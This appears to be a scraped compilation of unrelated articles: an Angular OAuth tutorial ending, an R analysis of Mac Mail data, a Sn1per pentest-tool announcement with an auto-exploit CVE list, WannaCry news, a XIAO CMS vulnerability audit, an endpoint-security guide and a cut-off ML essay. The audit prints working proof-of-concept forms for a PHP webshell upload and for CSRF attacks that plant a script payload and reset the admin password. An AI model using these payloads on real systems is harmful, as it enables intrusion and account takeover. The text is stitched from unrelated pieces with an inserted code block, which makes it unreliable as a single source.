import {ReactiveFormsModule} from "@angular/forms";
import {routing} from "./app.routing";

@NgModule({
  declarations: [
    AppComponent,
    LoginComponent,
    AddUserComponent,
    EditUserComponent,
    ListUserComponent
  ],
  imports: [
    BrowserModule,
    routing,
    ReactiveFormsModule,
    HttpClientModule
  ],
  providers: [ApiService],
  bootstrap: [AppComponent]
})
export class AppModule { }

app.routing.ts

import { RouterModule, Routes } from '@angular/router';
import {LoginComponent} from "./login/login.component";
import {AddUserComponent} from "./add-user/add-user.component";
import {ListUserComponent} from "./list-user/list-user.component";
import {EditUserComponent} from "./edit-user/edit-user.component";

const routes: Routes = [
  { path: 'login', component: LoginComponent },
  { path: 'add-user', component: AddUserComponent },
  { path: 'list-user', component: ListUserComponent },
  { path: 'edit-user', component: EditUserComponent },
  { path: '', component: LoginComponent }
];

export const routing = RouterModule.forRoot(routes);

Conclusion

In this article, we discussed implementing Spring Boot OAuth2 with an Angular application. We configured our authorization server and resource server using OAuth2 and secured our REST APIs. The same REST APIs were then accessed from the Angular client after obtaining a JWT OAuth token.

Download the source

Should Old Acquaintance be Forgot: Tidying up Mac Mail


(This article was first published on An Accounting and Data Science Nerd's Corner , and kindly contributed toR-bloggers)

As the year is closing down, why not spend some of the free time to explore your email data using R and the tidyverse? When I learned that Mac OS Mail stores its internal data in a SQLite database file I was hooked. A quick dive into your email archive might uncover some of your old acquaintances. Let's take a peek.

Obviously, the below is only applicable when you are a regular user of the Mail app for Mac OS. As a first step, you need to locate the file Envelope Index that tends to be located in ~/Library/Mail/V6/MailData/ . Copy this file somewhere and adjust the path provided in mail_db to point to this copy. Do not work with the original file.

library(DBI)
library(tidyverse)
library(lubridate)
library(ExPanDaR)
library(ggridges)
library(knitr)   # for kable(), used to print the tables below

# path to your COPY of the Envelope Index file, never the original
mail_db <- "data/EI"
con <- dbConnect(RSQLite::SQLite(), mail_db)

Now you have established a database connection to your copy of Mac OS Mail's internal data. If you receive an error message, check whether you have the required packages (including RSQLite) installed. With this established connection, we can now see what the database has in store for us.

kable(dbListTables(con), col.names = "List of Tables")

List of Tables
action_ews_messages
action_imap_messages
action_labels
action_messages
addresses
attachments
duplicates_unread_count
events
ews_copy_action_messages
ews_folders
imap_copy_action_messages
imap_labels
imap_messages
labels
last_spotlight_check_date
local_message_actions
mailbox_actions
mailboxes
messages
properties
recipients
sqlite_sequence
subjects
threads

Hey, this is an impressive list of tables. For this blog post, I am mostly interested in exploring the development of my email activity in terms of senders and receivers over time. Thus, I focus on the relations messages, addresses and recipients.

messages <- dbListFields(con, "messages")
recipients <- dbListFields(con, "recipients")
addresses <- dbListFields(con, "addresses")
max_members <- max(length(messages), length(recipients), length(addresses))
length(messages) <- max_members
length(recipients) <- max_members
length(addresses) <- max_members
df <- data.frame(messages, recipients, addresses, stringsAsFactors = FALSE)
df[is.na(df)] <- ""
kable(df)

messages                 recipients    addresses
ROWID                    ROWID         ROWID
message_id               message_id    address
document_id              type          comment
in_reply_to              address_id
remote_id                position
sender
subject_prefix
subject
date_sent
date_received
date_created
date_last_viewed
mailbox
remote_mailbox
flags
read
flagged
size
color
type
conversation_id
snippet
fuzzy_ancestor
automated_conversation
root_status
conversation_position
deleted

OK. These relations provide enough data to play. Let’s create a table that is organized by message and contains sender and receiver info as well as sending/receiving time.

sql <- paste("SELECT messages.ROWID as message_id, date_sent,",
             "date_received, a1.address as sender_address,",
             "a1.comment as sender_comment, a2.address as recipient_address,",
             "a2.comment as recipient_comment, snippet",
             "FROM messages LEFT JOIN addresses AS a1 ON messages.sender = a1.ROWID",
             "LEFT JOIN recipients ON recipients.message_id = messages.ROWID",
             "LEFT JOIN addresses AS a2 ON recipients.address_id = a2.ROWID")
res <- dbSendQuery(con, sql)
df <- dbFetch(res)
dbClearResult(res)
dbDisconnect(con)

# timestamps are stored as Unix epoch seconds
df[, c("date_sent", "date_received")] <-
  lapply(df[, c("date_sent", "date_received")],
         function(x) as.POSIXct(x, origin = "1970-01-01"))

The resulting data frame contains all messages, including messages sent to multiple recipients (with me on the sending or receiving end). To limit the messages to the ones where I am involved, I match sender_address and recipient_address against a vector my_addresses containing my email addresses (not disclosed here for privacy reasons).

df %>%
  filter(tolower(sender_address) %in% my_addresses |
           tolower(recipient_address) %in% my_addresses) %>%
  distinct(.keep_all = TRUE) %>%
  arrange(date_received) -> emails

In addition, I prepare a panel dataset that contains data at email address year level.

emails %>%
  filter(!tolower(sender_address) %in% my_addresses) %>%
  mutate(address = tolower(sender_address),
         year = year(date_received)) %>%
  group_by(year, address) %>%
  summarise(emails_received_from = n()) -> emails_received

emails %>%
  filter(!tolower(recipient_address) %in% my_addresses) %>%
  mutate(address = tolower(recipient_address),
         year = year(date_received)) %>%
  group_by(year, address) %>%
  summarise(emails_sent_to = n()) -> emails_sent

panel <- full_join(emails_received, emails_sent) %>%
  replace_na(list(emails_sent_to = 0, emails_received_from = 0)) %>%
  arrange(year, -emails_sent_to, -emails_received_from)

Time for a first analysis. How does my email in- and outflow develop over the years?

panel %>%
  group_by(year) %>%
  summarise(sent_mails = sum(emails_sent_to),
            received_mails = sum(emails_received_from)) %>%
  gather(key = "var", value = "count", -year) %>%
  ggplot(aes(year, count)) +
  geom_bar(aes(fill = var), position = "dodge", stat = "identity") +
  scale_fill_discrete(name = "Direction", labels = c("Emails received", "Emails sent")) +
  xlab("Year") +
  ylab("Number of emails") +
  theme_minimal() +
  theme(legend.position = c(.3, .8))

Hmm. I have no interest in extrapolating this time trend… Just for fun and giggles: When do I send emails (by time of day)?

emails %>%
  filter(sender_address %in% my_addresses) %>%
  mutate(sent_tod = hour(date_sent)) %>%
  ggplot() +
  geom_histogram(aes(sent_tod), binwidth = 1, fill = "#00376C") +
  xlab("Time of day [24 hours]") +
  ylab("Number of emails") +
  theme_minimal()

No real surprises here (at least for me), besides that I seem to take a dip in the early afternoon. Does this sending behavior exhibit any interesting time trends?

emails %>%
  filter(sender_address %in% my_addresses) %>%
  mutate(sent_tod = hour(date_sent) + minute(date_sent)/60 + second(date_sent)/3600,
         year = as.factor(year(date_sent))) %>%
  ggplot(aes(x = sent_tod, y = year, fill = ..x..)) +
  geom_density_ridges_gradient(scale = 2, rel_min_height = 0.01) +
  ylab("Year") +
  xlab("Time of day [24 hours]") +
  theme_minimal() +
  theme(legend.position = "none")

2002 and 2003 stand out (I was based in the U.S. for most of this period) and it seems as if I am gradually becoming more of an early starter.

But enough on this. This is supposed to be about old acquaintances to fit this special end-of-the-year mood. Let’s dive more into the personal sphere. For this, I define an “email contact” as an email address with an email exchange in a given year, meaning that I was both, at the receiving and sending end, at least once.

panel %>%
  group_by(year) %>%
  filter(emails_sent_to > 0, emails_received_from > 0) %>%
  summarise(nr_email_contacts = n()) %>%
  ggplot(aes(year, nr_email_contacts)) +
  geom_bar(stat = "identity", fill = "#00376C") +
  xlab("Year") +
  ylab("Head count email contacts") +
  theme_minimal()

I would never have guessed that I am exchanging emails with that many people (no, I am not a spammer ..., I hope). Who are my "top contacts"?

panel %>%
  filter(emails_sent_to > 0, emails_received_from > 0) %>%
  group_by(address) %>%
  summarise(email_contacts = sum(emails_sent_to) + sum(emails_received_from),
            sent_rec_ratio = sum(emails_sent_to) / sum(emails_received_from),
            emails_sent_to = sum(emails_sent_to),
            emails_received_from = sum(emails_received_from)) %>%
  arrange(-email_contacts) -> email_contacts

# head(email_contacts, 50)

I am not including this output here for obvious privacy reasons. If you are interested to follow your email contacts over time, you can use my ExPanD shiny app for quick exploration.

panel %>%
  filter(emails_sent_to > 0, emails_received_from > 0) %>%
  ExPanD(cs_id = "address", ts_id = "year",
         components = c(missing_values = FALSE,
                        by_group_violin_graph = FALSE,
                        by_group_bar_graph = FALSE))

Using ExPanD, I encountered a reasonable number of my "old acquaintances" when focusing on earlier years of the panel. To do this a little more systematically, I prepare a linking table that maps the most prominent email contact addresses in the panel file to real people's names, an n (email addresses) to 1 (person) look-up table. This table has the name email_contacts_names and the fields address and name. Based on this data I produce a new panel sample containing only those email contacts linked to actual persons that I care about.

panel %>%
  left_join(email_contacts_names) %>%
  filter(!is.na(name)) %>%
  group_by(year, name) %>%
  summarise(emails_sent_to = sum(emails_sent_to),
            emails_received_from = sum(emails_received_from)) %>%
  filter(emails_sent_to > 0, emails_received_from > 0) %>%
  mutate(email_contacts = emails_sent_to + emails_received_from,
         sent_rec_ratio = emails_sent_to / emails_received_from) %>%
  arrange(year, -email_contacts) -> panel_email_contacts

Using this data, you can now easily explore how your contacts changed over time. As one example I prepared a graph highlighting the (relative) number of email contacts with a selected group of people over time. The vector people contains the names of these people.

single_out_people <- function(df, names, relative = FALSE) {
  df$relative <- relative
  # grey for "Other", one hue per singled-out person
  palette <- function(n) {
    hues = seq(15, 375, length = n)
    c("#B0B0B0", hcl(h = hues, l = 65, c = 100)[1:n])
  }
  df %>%
    mutate(name = ifelse(name %in% names, name, "Other")) %>%
    group_by(year) %>%
    mutate(val = ifelse(relative, email_contacts/sum(email_contacts), email_contacts)) %>%
    select(year, name, val) %>%
    group_by(year, name) %>%
    summarise(val = sum(val)) %>%
    spread(key = name, value = val, fill = 0) %>%
    gather(key = name, value = val, -year) %>%
    mutate(name = factor(name, levels = c("Other", rev(names)))) %>%
    arrange(year, name) %>%
    ggplot(aes(x = year, y = val, fill = name)) +
    geom_area() +
    scale_fill_manual(values = palette(length(names))) +
    xlab("Year") +
    ylab(ifelse(relative, "Share of annual email contacts", "Annual email contacts")) +
    theme_minimal() -> p
  if (relative) p + scale_y_continuous(labels = scales::percent) else p
}

single_out_people(panel_email_contacts, people, FALSE) + theme(legend.position = "none")
single_out_people(panel_email_contacts, people, TRUE) + theme(legend.position = "none")

The grayish area marks "Other". With legends excluded for privacy reasons, you can follow old and new friends through time with this little display.

While the Envelope Index database seems to offer much more data that is worth exploring, I will leave it here. Happy New Year everybody and, if you are in the mood: Auld Lang Syne.

Enjoy!


Sn1per v6.0: An Automated Penetration Testing Framework Built for Security Professionals

Introduction

Today we introduce an automated penetration testing framework designed for security professionals, called Sn1per. Sn1per Community Edition is an automated scanning tool that helps researchers enumerate and scan for vulnerabilities during a penetration test. Sn1per Professional is an additional reporting plugin from Xero Security that helps professional penetration testers, bug bounty hunters and corporate security teams manage large environments.


Sn1per Professional features

Professional reporting interface
Report screenshots viewable as a slideshow
Searchable and sortable DNS, IP and open-port database
Reports categorized by host
Quick links to online recon tools and Google Hacking queries
Custom note text per host

Demo video

Video: https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm

Sn1per Community Edition features:

Automatically collects basic recon (e.g. whois, ping, DNS, etc.)

Automatically launches Google Hacking queries against the target domain

Automatically enumerates open ports via Nmap port scanning

Automatically brute-forces subdomains, gathers DNS information and checks for zone transfers

Automatically checks for subdomain hijacking

Automatically runs Nmap scripts against open ports

Automatically runs Metasploit scan and exploit modules

Automatically scans for all common web application vulnerabilities

Automatically brute-forces all open services

Automatically tests for anonymous FTP access

Automatically runs WPScan, Arachni and Nikto

Automatically enumerates NFS shares

Automatically tests for anonymous LDAP access

Automatically enumerates SSL/TLS ciphers, protocols and vulnerabilities

Automatically enumerates SNMP community strings, services and users

Automatically lists SMB users and shares, checks for null sessions and exploits MS08-067

Automatically tests open X11 servers

Performs advanced host/subnet enumeration

Automatically collects screenshots of target sites

Creates a separate workspace to store all scan output

Auto-PWN:

Drupal Drupalgeddon2 remote code execution CVE-2018-7600

GPON router remote code execution CVE-2018-10561

Apache Struts 2 remote code execution CVE-2017-5638

Apache Struts 2 remote code execution CVE-2017-9805

Apache Jakarta remote code execution CVE-2017-5638

Shellshock GNU Bash remote code execution CVE-2014-6271

HeartBleed OpenSSL detection CVE-2014-0160

MS Windows SMB remote code execution MS08-067

Webmin file disclosure CVE-2006-3392

Anonymous FTP access

phpMyAdmin backdoor remote code execution

phpMyAdmin authentication bypass

JBoss Java deserialization remote code execution

Kali Linux install:

./install.sh

Docker install/build

Docker install:

https://github.com/menzow/sn1per-docker

Docker build:

https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/

Usage example

$ docker pull menzo/sn1per-docker
$ docker run --rm -ti menzo/sn1per-docker sniper menzo.io

Tool usage

[*] NORMAL MODE
sniper -t|--target <TARGET>

[*] NORMAL MODE + OSINT + RECON
sniper -t|--target <TARGET> -o|--osint -re|--recon

[*] STEALTH MODE + OSINT + RECON
sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon

[*] DISCOVER MODE
sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORKSPACE_ALIAS>

[*] SCAN ONLY SPECIFIC PORT
sniper -t|--target <TARGET> -m port -p|--port <portnum>

[*] FULLPORTONLY SCAN MODE
sniper -t|--target <TARGET> -fp|--fullportonly

[*] PORT SCAN MODE
sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>

[*] WEB MODE - PORT 80 + 443 ONLY!
sniper -t|--target <TARGET> -m|--mode web

[*] HTTP WEB PORT MODE
sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>

[*] HTTPS WEB PORT MODE
sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>

[*] ENABLE BRUTEFORCE
sniper -t|--target <TARGET> -b|--bruteforce

[*] AIRSTRIKE MODE
sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike

[*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED
sniper -f|--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>

[*] ENABLE LOOT IMPORTING INTO METASPLOIT
sniper -t|--target <TARGET>

[*] LOOT REIMPORT FUNCTION
sniper -w <WORKSPACE_ALIAS> --reimport

[*] UPDATE SNIPER
sniper -u|--update

Sample report: [link]

Project

Sn1per v6.0: [GitHub link]

* Source: kitploit; compiled by FB editor Alpha_h4ck. Please credit CodeSec.Net when reposting.

Beware! The WannaCry Ransomware Is Still Lurking on Computers Around the World



Sina Tech, 27 December afternoon: According to Taiwanese technology media iThome, Jamie Hankins, who leads security and threat intelligence research at security firm Kryptos Logic, said on Twitter last week that WannaCry, the ransomware that caused major economic losses worldwide, is still lurking on computers around the world.

WannaCry used the EternalBlue exploit tool to attack a Server Message Block (SMB) vulnerability in Microsoft Windows; EternalBlue was developed by the US National Security Agency (NSA).

On 12 May 2017, WannaCry first struck in Europe, encrypting files on compromised computers and demanding a ransom. It could also actively detect and infect other vulnerable devices on the network, so within just two days it had infected hundreds of thousands of computers in more than 150 countries. The culprit behind this year's major outage at TSMC was also a WannaCry variant.

The person chiefly responsible for slowing WannaCry's rampage was Kryptos Logic researcher Marcus Hutchins, who found that WannaCry's ransomware component had a "kill switch": WannaCry would try to connect to a domain name, and if the domain was not found it would encrypt the computer's files. In other words, if WannaCry could reach the domain, it would not encrypt files on the infected computer.

Fortunately, nobody had registered the domain. Hutchins then registered it and kept it running, successfully stopping WannaCry's ransom capability.

The domain supporting the kill switch is now maintained by Cloudflare, and because computers already infected with WannaCry still periodically connect to the kill-switch domain, Kryptos Logic can keep observing the state of the infection.

According to data Jamie Hankins posted on Twitter on 21 December, in the 24 hours before the post they detected more than 2.7 million connections to the kill-switch domain from 220,000 unique IPs in 184 countries, and in the preceding week more than 17 million connections from 630,000 unique IPs in 194 countries.

Hankins also noted that these unique IPs do not represent actual infection counts, but the volume is still startling. The top five sources of traffic were China, Indonesia, Vietnam, India and Russia.

WannaCry instances still lurking on computers remain at risk of going off: for example, once the network is disconnected or the kill-switch domain cannot be reached, WannaCry's ransomware component will execute again.

Businesses and users can use the free Telltale service from Kryptos Logic to detect security threats on their computers, including WannaCry.

XIAO CMS Audit


While browsing Anquanke I saw that six CVEs had been published for XIAO CMS, so let's audit it.


Arbitrary directory deletion

Follow into database.php.

The action is import; find that function.



You can see that the paths POST parameter is not filtered for ./, so arbitrary files can be deleted; also, the paths parameter in the payload should be sent via POST =.=

Let's create a directory of our own to test with.



I created a directory named ckj123; let's see whether it can be deleted.



Success.

Arbitrary file upload

The uploadfile.php file is plainly visible.

Find where files are uploaded.

All uploads go through an upload function.



It loads a class called upload.

It then takes the file's final extension and checks whether it is an image or another kind of file.

Follow into upload.



Follow into the upload class.



There is a filtering step inside.



It gets the extension and compares it against the restricted types.



You can see that this type has to be passed in by the caller.



There are two actions in total.

The lower one has a hard-coded type.

The upper one's type is supplied by the caller, which makes it possible to upload a PHP file.


<html>
<body>
<form action="http://127.0.0.1:8080/admin/index.php?c=uploadfile&a=uploadify_upload&type=php&size=1000" method="post" enctype="multipart/form-data">
  <input type="file" name="file" />
  <input type="submit" name="submit" value="submit" />
</form>
</body>
</html>

The payload given in the CVE is wrong..



It succeeded; then connect to the uploaded webshell.


CSRF

It does not check where the Referer comes from, so CSRF is possible anywhere. Two examples:

Add a content page containing an XSS payload

<html>
<body>
<form action="http://127.0.0.1:8080/admin/index.php?c=content&a=add&catid=3" method="POST">
  <input type="hidden" name="data[catid]" value="3" />
  <input type="hidden" name="data[title]" value="test" />
  <input type="hidden" name="data[thumb]" value="" />
  <input type="hidden" name="data[keywords]" value="" />
  <input type="hidden" name="data[description]" value="" />
  <input type="hidden" name="data[content]" value="<script>alert(1)</script>" />
  <input type="hidden" name="data[xiao_auto_description]" value="1" />
  <input type="hidden" name="data[xiao_auto_thumb]" value="1" />
  <input type="hidden" name="data[xiao_download_image]" value="1" />
  <input type="hidden" name="data[time]" value="2018-11-02+15:05:43" />
  <input type="hidden" name="data[hits]" value="" />
  <input type="hidden" name="submit" value="提交" />
  <input type="submit" value="Submit request" />
</form>
</body>
</html>

Change the administrator's password

<form action="http://127.0.0.1:8080/admin/index.php?c=index&a=my" method="POST">
  <input type="hidden" name="data[password]" value="1234567">
  <input type="hidden" name="submit" value="提交" />
  <input type="submit" value="Submit request" />
</form>

Postscript

I have not looked at the XSS vulnerabilities; I will add them later when I have time.
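The two server-side checks whose absence the audit above relies on (an upload type controlled by the client, and no Referer or token check on state-changing admin requests), as an added example in TypeScript that is not XIAO CMS code. The function names (checkUpload, issueCsrfToken, verifyStateChangingRequest), the upload categories and the origins are constructed for the example; the same logic would be written in the CMS's own PHP.

```typescript
// Added example, not XIAO CMS code: server-side upload-type and CSRF checks.
// Helper names, categories and origins are constructed for illustration.

// Server-defined upload categories. A request may only choose a key; the list
// of permitted extensions itself never comes from the request.
const UPLOAD_TYPES: { [type: string]: string[] } = {
  image: ['jpg', 'jpeg', 'png', 'gif'],
  file: ['zip', 'pdf', 'txt'],
};

export type UploadDecision = { ok: true; ext: string } | { ok: false; reason: string };

export function checkUpload(filename: string, clientType: string): UploadDecision {
  // hasOwnProperty so that "constructor" or "__proto__" cannot resolve to
  // something inherited from Object.prototype
  if (!Object.prototype.hasOwnProperty.call(UPLOAD_TYPES, clientType)) {
    return { ok: false, reason: 'unknown upload type "' + clientType + '"' };
  }
  const allowed = UPLOAD_TYPES[clientType];
  // Strip any path component the client may have sent, then take the LAST
  // extension, so "a.jpg.php" is judged by "php".
  const parts = filename.split(/[\\/]/);
  const base = parts[parts.length - 1];
  const dot = base.lastIndexOf('.');
  if (dot <= 0 || dot === base.length - 1) {
    return { ok: false, reason: 'missing file extension' };
  }
  const ext = base.slice(dot + 1).toLowerCase();
  if (allowed.indexOf(ext) === -1) {
    return { ok: false, reason: 'extension "' + ext + '" not allowed for type "' + clientType + '"' };
  }
  return { ok: true, ext };
}

// CSRF protection: a per-session token that every admin form must echo back,
// plus an Origin/Referer check, on every state-changing request.
const csrfTokens: { [sessionId: string]: string } = Object.create(null);

// `token` must be produced by a CSPRNG (crypto.randomBytes or similar) by the
// caller; it is passed in so this example needs no platform-specific import.
export function issueCsrfToken(sessionId: string, token: string): string {
  csrfTokens[sessionId] = token;
  return token;
}

// Compare without leaking where the first mismatch is.
function constantTimeEqual(a: string, b: string): boolean {
  if (a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

export interface StateChangingRequest {
  sessionId: string;
  csrfToken?: string;  // hidden form field
  origin?: string;     // Origin header
  referer?: string;    // Referer header
}

export function verifyStateChangingRequest(
  req: StateChangingRequest, siteOrigin: string): { ok: boolean; reason?: string } {
  const expected = csrfTokens[req.sessionId];
  if (!expected || !req.csrfToken || !constantTimeEqual(expected, req.csrfToken)) {
    return { ok: false, reason: 'missing or invalid CSRF token' };
  }
  // Prefer Origin, fall back to Referer; with neither we cannot tell where the
  // request came from, so it is refused rather than waved through.
  const source = req.origin || req.referer;
  if (!source) return { ok: false, reason: 'no Origin or Referer header' };
  const m = /^([a-z][a-z0-9+.-]*:\/\/[^/?#]+)/i.exec(source);
  if (!m) return { ok: false, reason: 'unparseable Origin/Referer' };
  if (m[1].toLowerCase() !== siteOrigin.toLowerCase()) {
    return { ok: false, reason: 'cross-site request from ' + m[1] };
  }
  return { ok: true };
}
```

With these checks in place, the upload form above is rejected because "php" is not a server-known category, and both CSRF forms are rejected for lacking the session token (and, if served from another site, for their Origin).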

5 Steps to Mitigate Endpoint Security Incidents


Endpoint security may be the best investment you have ever made. According to a Ponemon survey, The 2017 State of Endpoint Security Risk, the average cost to an organization of attacks that managed to breach endpoint security was $5 million.

In this article, we will look at what you need to know about endpoint security in order to develop a workable strategy to mitigate endpoint-related incidents.

What is an endpoint?

In IT, an endpoint is a device (e.g. a computer, mobile or wireless device, server, etc.) that has a remote connection to a network and is a potentially vulnerable access point or gateway to that network.

What is endpoint security?

Endpoint security involves creating policies that lay down the rules with which devices must comply before they can access network resources. Endpoint security is particularly important today as more and more organizations adopt BYOD, increasing the number of devices presenting a risk to the network.

Traditional anti-virus protection is no longer sufficient to protect endpoints and organizations. The four essentials of an effective endpoint security strategy are:

Discovery (and Inventory): Discovery and vulnerability scanning tools can help you inventory your network assets as well as unprotected endpoints, and assist you in drawing up a security requirements plan.

Monitoring (and Threat Hunting): A centralized endpoint management tool will enable automated, consistent monitoring of the network and should include active threat hunting software.

Protection: While anti-virus is not sufficient on its own as an endpoint security strategy, implementing an advanced anti-malware application is non-negotiable.

Response (and Alerting): Your network management tool must include the capability for instant remediation in the event of a breach. You will also need a written incident response policy.

Important steps to mitigate cyber security incidents generally

An endpoint security strategy is just one part of an organization’s bigger cybersecurity picture. Endpoints do not operate in a vacuum; patching your operating system, performing daily backups and educating your users will all contribute to bolstering your endpoint security.

A document developed by the Australian Signals Directorate (ASD) Strategies to Mitigate Cyber Security Incidents Mitigation Details provides an excellent overview of all the steps you need to take to bolster the security of your entire system, including its endpoints. The list is comprehensive and gives a sobering overview of the challenges your IT security employees need to address. The following steps are lifted verbatim from the document and provide a useful checklist for companies to analyze their current protection policies and potential vulnerabilities, including those related to endpoints.

Mitigation strategies to prevent malware delivery and execution
Application whitelisting
Patch applications
Configure Microsoft Office macro settings
User application hardening
Automated dynamic analysis of email and web content run in a sandbox
Email content filtering
Web content filtering
Deny corporate computers direct Internet connectivity
Operating system generic exploit mitigation
Server application hardening
Operating system hardening
Antivirus software using heuristics and reputation ratings
Control removable storage media and connected devices
Block spoofed emails
User education
Antivirus software with up-to-date signatures
TLS encryption between email servers

Mitigation strategies to limit the extent of cyber security incidents
Restrict administrative privileges
Patch operating systems
Multi-factor authentication
Disable local administrator accounts
Network segmentation
Protect authentication credentials
Non-persistent virtualized sandboxed environment
Software-based application firewall, blocking incoming network traffic
Software-based application firewall, blocking outgoing network traffic
Outbound web and email data loss prevention

Mitigation strategies to detect cyber security incidents and respond
Continuous incident detection and response
Host-based intrusion detection/prevention system
Endpoint detection and response software
Hunt to discover incidents
Network-based intrusion detection/prevention system
Capture network traffic

Mitigation strategies to recover data and system availability
Daily backups
Business continuity and disaster recovery plans
System recovery capabilities

Mitigation strategy specific to preventing malicious insiders
Personnel management

According to a Kaspersky Lab article, How to mitigate 85% of threats with only four strategies, the ASD’s recommendations are “the best publicly available guidelines from a government organization on how to successfully fight APTs.”

In an innovative approach to developing security foci, Kaspersky groups the ASD’s strategies (what we have labeled steps) into four logical types. Next to each type below, we suggest an example of applying that type of strategy to endpoint security:

Administrative: Training and security awareness. A 2016 survey of security professionals, What are the biggest threats to endpoint security in your organization?, found that negligent employee behavior when it came to following organizations’ security rules and procedures was the biggest endpoint security threat.

Networking: Network segmentation can prevent unauthorized traffic from spreading across a breached network and affecting other endpoints.

System administration: Software patching. A new trend in endpoint security threats is the fileless attack. According to McAfee, the best protection is keeping your software up-to-date.

Specialized security administration: Endpoint Detection and Response (EDR) software to find vulnerabilities before a breach occurs.

5 strategies to mitigate endpoint incidents

Professional endpoint security solutions usually provide the software to help you implement the below strategies, but there are also free and open source tools to help you get started. It is recommended you use a free tool initially to map the endpoints on your network in order to get a better understanding of your security requirements. A specialist tool can later do a more detailed scan.

1. Network analysis: You can’t protect an endpoint you don’t know is there, what the industry calls a dark endpoint, rogue access point or blind spot. You can use an automated network discovery tool to inventory your endpoints and identify who is accessing them and what software they are running.

2. Brush up on modern endpoint security techniques: DLP, EDR, NAC, HIPS … do you know what these techniques are all about? Read more below.

3. Research specialized endpoint security solution options: There is a plethora of professional endpoint security suites on the market. It can be confusing. Learn what to ask a vendor before you select a solution. Solutions Review provides some tips below.

4. Prioritize automated endpoint detection and response (EDR): EDR should be the cornerstone of your strategy as, amongst other things, it proactively hunts for potential threats.

5. Implement an endpoint security policy: This should be a written document that describes the software and hardware your company has employed to protect network endpoints. It should also provide security guidelines for employees, e.g. how to secure their BYOD endpoints.

Modern security techniques

When you choose an endpoint solution, ask your vendor whether their product includes the following layers of protection:

Host-Based Intrusion Prevention System (HIPS): Incorporates intrusion detection and firewall elements to alert users to attempted malicious activity and prevent it from being carried out. It protects your network from known and unknown cyber attacks by monitoring code for suspicious activity on a host. For example, a HIPS might notice that code is being executed to try to shut down your anti-virus, and prevent it from doing so.

Data Loss Prevention (DLP): Designed to help network administrators prevent sensitive information, e.g. emails or files, from being sent outside a network.

Network Access Control (NAC): Enforces policies that define who can have access to a network and what privileges they have, e.g. employees versus guests. For example, NAC can ensure compromised endpoints are shut down in the event of an incident.

Endpoint Detection and Response (EDR): A one-stop solution that allows administrators to monitor networks, detect and investigate possible threats, and respond to attacks. EDR uses complex analytic algorithms to provide constant visibility into the network from a centralized portal. Top EDRs allow integration with 3rd-party tools, enabling organizations to customize their endpoint security strategy and align it with their existing security software.

Security Awareness

Specialized endpoint security solutions

Expensive but worth it, specialist, reputable endpoint solution vendors include Check Point, Comodo, Symantec, Kaspersky and McAfee. The problem is not the price but deciding which solution to run with. Largely, the above products are very similar; they are just marketed differently.

The Check Point solution provides an example of what basic features you should be looking for to protect your endpoints:

- Ability to encrypt entire disks, removable devices and ports
- Advanced anti-virus and anti-malware software
- Intelligent behavioral analysis and reporting
- Remote access VPN for employees on the road
- An advanced firewall and compliance checking ability to ensure endpoint behavior is in accordance with your organization’s security policies
- Sandbox isolation and quarantine of threats and compromised hosts
- An endpoint policy management dashboard that provides maximum visibility into all security areas in the company and allows for immediate remediation in the event of an incident

Solutions Review’s Endpoint Security Buyer’s Guide (paywall) is a guide to choosing an endpoint solution from the most popular vendors. The downloadable PDF includes tips on what you should ask your potential new provider:

- Does the product’s core functionality (anti-malware, firewall and device control) feature the latest techniques, e.g. behavioral detection?
- Is the solution platform- and OS-agnostic?
- Does it have a centralized management console that can provide a granular view of your data?
- How does it react to unexpected threats, e.g. zero-days?
- What support does the vendor offer?

Free endpoint security tools

Bearing in mind that you (hopefully) have security software and policies in place, it might be a good idea to try before you buy and explore your options. This will give you a high-level view of your current endpoint security situation, and help you learn more about your network, the devices connected to it and what the best solution for your requirements might be.

- Use Shodan to identify any unprotected internet-connected devices on your network
- Try PacketFence, a free Network Access Control (NAC) solution
- Experiment with a solution that offers a trial evaluation. eSecurity Planet has done all the research. Also, check out SecureAPlus, DeviceLock and Comodo.
- Two network discovery tools to try out are Open-AudIT and NetSurveyor
- Nmap is a popular, and powerful, open source network mapper
- OPSWAT is a free endpoint security scanner that includes network mapping and anti-malware

Machine Learning in Cybersecurity Demystifying Buzzwords & Getting to t ...


Earlier this month, I had the opportunity to discuss the role of machine learning in security with Dave Shackleford from SANS. It was a fun discussion, and if you have the time, I encourage you to check it out here .

One of the recurring themes throughout our discussion was the need to separate the marketing hype from the reality when it comes to the capabilities (and use) of data science, particularly in security. I think this is a really important topic and one I’d like to dig into more here. New analytical and detection models are absolutely changing the world of security. We are transitioning from a time of static signatures to more complex multi-dimensional detection models that can understand the behavior of an attacker. To say this is important is an understatement.

But on the other hand, I think many security vendors have gotten a bit drunk on AI buzzwords, and worse still, are treating their algorithms like magical black boxes. If you can’t see how the detection system works and vendors are playing fast and loose with terminology, how can you have confidence in your security? So with that in mind, I’d like to offer a take that tries to demystify some of the terminology and focus on the practical side of what matters for your security when it comes to data science and machine learning.

AI Disambiguation

Artificial Intelligence has become a sort of strange term in society. You see it referred to in all sorts of marketing, including security marketing. But if you ask someone to explain what that AI means, you typically get vague answers. And that is because there is a bit of a mismatch between the cultural and technical uses of the term Artificial Intelligence. Culturally when we say AI, we often think of SkyNet or Ex Machina, depending on which decade you get your science fiction. This sort of AI is referred to as “General AI” and refers to the ability for a machine to solve virtually any problem that a human could. This form of AI also doesn’t exist today.

The AI that we have today is what is called “Narrow AI”, and it refers to teaching a machine to tackle a specific problem: playing chess, recognizing a voice, or detecting an application attack. This notion of AI has been around since the 1960s and is used to describe a host of analytical techniques, including machine learning.

And this is the disconnect. If you ask most people about AI and machine learning, they often think that AI is more sophisticated than machine learning. But in terms of the narrow AI that we have today, AI is actually the more generic term. And this is why I hate seeing AI being overused in marketing. It sounds cool, but it almost never means something concrete.

It’s All About Work Reduction

